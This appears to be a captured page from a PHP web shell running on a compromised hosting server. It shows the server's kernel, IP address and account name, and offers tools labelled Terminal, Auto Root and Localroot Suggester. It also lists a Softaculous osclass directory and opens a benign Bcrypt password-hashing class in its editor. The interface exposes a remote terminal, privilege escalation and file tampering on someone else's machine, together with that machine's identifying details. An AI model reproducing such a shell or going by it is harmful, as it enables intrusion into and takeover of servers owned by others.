Linux ams-business-8.hostwindsdns.com 4.18.0-553.80.1.lve.el8.x86_64 #1 SMP Wed Oct 22 19:29:36 UTC 2025 x86_64
LiteSpeed
Server IP : 192.236.177.161 & Your IP : 216.73.216.154
Domains :
Cant Read [ /etc/named.conf ]
User : ajzdfbpz
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
softaculous /
osclass /
Delete
Unzip
Name
Size
Permission
Date
Action
images
[ DIR ]
drwxr-xr-x
2017-07-04 10:22
php53
[ DIR ]
drwxr-xr-x
2017-07-04 10:22
php56
[ DIR ]
drwxr-xr-x
2017-07-04 10:22
Bcrypt.php
2.82
KB
-rw-r--r--
2013-12-11 08:18
changelog.txt
1.94
KB
-rw-r--r--
2017-04-28 06:14
clone.php
5.58
KB
-rw-r--r--
2017-04-28 06:49
config.php
509
B
-rw-r--r--
2013-07-16 07:23
edit.php
6.17
KB
-rw-r--r--
2017-04-28 06:49
edit.xml
433
B
-rw-r--r--
2016-10-19 05:06
fileindex.php
132
B
-rw-r--r--
2016-12-14 07:00
import.php
3.41
KB
-rw-r--r--
2017-04-28 06:49
info.xml
1.61
KB
-rw-r--r--
2017-04-28 06:14
install.js
921
B
-rw-r--r--
2013-02-27 07:34
install.php
13.3
KB
-rw-r--r--
2017-04-28 06:49
install.xml
918
B
-rw-r--r--
2013-07-16 07:23
md5
1.77
KB
-rw-r--r--
2017-04-28 06:49
notes.txt
120
B
-rw-r--r--
2015-05-13 07:24
robots.txt
34
B
-rw-r--r--
2016-12-14 07:00
update_pass.php
5.02
KB
-rw-r--r--
2013-12-11 08:18
upgrade.php
4.24
KB
-rw-r--r--
2017-04-28 06:49
upgrade.xml
328
B
-rw-r--r--
2012-05-05 07:38
Save
Rename
<?php class Bcrypt { private $rounds; public function __construct($rounds = 12) { global $error; if(CRYPT_BLOWFISH != 1) { $error[] = "bcrypt not supported in this installation. See http://php.net/crypt"; } $this->rounds = $rounds; } public function hash($input) { $hash = crypt($input, $this->getSalt()); if(strlen($hash) > 13) return $hash; return false; } public function verify($input, $existingHash) { $hash = crypt($input, $existingHash); return $hash === $existingHash; } private function getSalt() { $salt = sprintf('$2a$%02d$', $this->rounds); $bytes = $this->getRandomBytes(16); $salt .= $this->encodeBytes($bytes); return $salt; } private $randomState; private function getRandomBytes($count) { $bytes = ''; if(function_exists('openssl_random_pseudo_bytes') && (strtoupper(substr(PHP_OS, 0, 3)) !== 'WIN')) { // OpenSSL slow on Win $bytes = openssl_random_pseudo_bytes($count); } if($bytes === '' && is_readable('/dev/urandom') && ($hRand = @fopen('/dev/urandom', 'rb')) !== FALSE) { $bytes = fread($hRand, $count); fclose($hRand); } if(strlen($bytes) < $count) { $bytes = ''; if($this->randomState === null) { $this->randomState = microtime(); if(function_exists('getmypid')) { $this->randomState .= getmypid(); } } for($i = 0; $i < $count; $i += 16) { $this->randomState = md5(microtime() . $this->randomState); if (PHP_VERSION >= '5') { $bytes .= md5($this->randomState, true); } else { $bytes .= pack('H*', md5($this->randomState)); } } $bytes = substr($bytes, 0, $count); } return $bytes; } private function encodeBytes($input) { // The following is code from the PHP Password Hashing Framework $itoa64 = './ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'; $output = ''; $i = 0; do { $c1 = ord($input[$i++]); $output .= $itoa64[$c1 >> 2]; $c1 = ($c1 & 0x03) << 4; if ($i >= 16) { $output .= $itoa64[$c1]; break; } $c2 = ord($input[$i++]); $c1 |= $c2 >> 4; $output .= $itoa64[$c1]; $c1 = ($c2 & 0x0f) << 2; $c2 = ord($input[$i++]); $c1 |= $c2 >> 6; $output .= $itoa64[$c1]; $output .= $itoa64[$c2 & 0x3f]; } while (1); return $output; } } ?>